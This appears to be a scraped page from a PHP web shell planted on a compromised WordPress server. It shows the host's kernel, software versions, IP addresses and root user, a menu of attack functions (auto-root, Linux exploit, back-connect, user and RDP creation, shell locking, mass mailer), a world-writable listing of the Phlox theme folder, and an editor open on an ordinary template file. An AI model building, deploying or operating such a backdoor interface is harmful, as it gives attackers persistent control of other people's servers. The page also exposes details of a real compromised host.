Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
inselect /
wp-content /
themes /
phlox /
[ HOME SHELL ]
Name
Size
Permission
Action
auxin
[ DIR ]
drwxrwxrwx
auxin-content
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
languages
[ DIR ]
drwxrwxrwx
templates
[ DIR ]
drwxrwxrwx
woocommerce
[ DIR ]
drwxrwxrwx
README.txt
53.08
KB
-rwxrwxrwx
archive.php
1.61
KB
-rwxrwxrwx
comments.php
5.27
KB
-rwxrwxrwx
footer.php
436
B
-rwxrwxrwx
functions.php
816
B
-rwxrwxrwx
header.php
1.09
KB
-rwxrwxrwx
index.php
1.81
KB
-rwxrwxrwx
package-lock.json
685.47
KB
-rwxrwxrwx
page.php
1010
B
-rwxrwxrwx
rtl.css
59.56
KB
-rwxrwxrwx
screenshot.png
1.46
MB
-rwxrwxrwx
search.php
864
B
-rwxrwxrwx
searchform.php
552
B
-rwxrwxrwx
sidebar-footer.php
3.22
KB
-rwxrwxrwx
sidebar-primary.php
3.42
KB
-rwxrwxrwx
sidebar-secondary.php
1.91
KB
-rwxrwxrwx
sidebar.php
193
B
-rwxrwxrwx
single.php
1.61
KB
-rwxrwxrwx
style.css
1.69
KB
-rwxrwxrwx
taxonomy.php
1016
B
-rwxrwxrwx
wpml-config.xml
2.53
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single.php
<?php /** * The Template for displaying all single posts * * * @package Auxin * @author averta (c) 2014-2022 * @link http://averta.net */ get_header(); ?> <main id="main" <?php auxin_content_main_class(); ?> > <div class="aux-wrapper"> <div class="aux-container aux-fold"> <div id="primary" class="aux-primary" > <div class="content" role="main" > <?php if ( ! ( function_exists( 'auxin_theme_do_location' ) && auxin_theme_do_location( 'single' ) ) && ! ( function_exists( 'elementor_theme_do_location' ) && elementor_theme_do_location( 'single' ) ) ) { $is_pass_protected = post_password_required(); if ( have_posts() && ! $is_pass_protected ) { get_template_part('templates/theme-parts/single', get_post_type() ); comments_template( '/comments.php', true ); } elseif( $is_pass_protected ) { echo get_the_password_form(); } else { get_template_part('templates/theme-parts/content', 'none' ); } } ?> </div><!-- end content --> </div><!-- end primary --> <?php get_sidebar(); ?> </div><!-- end container --> </div><!-- end wrapper --> </main><!-- end main --> <?php get_sidebar('footer'); ?> <?php get_footer(); ?>
Close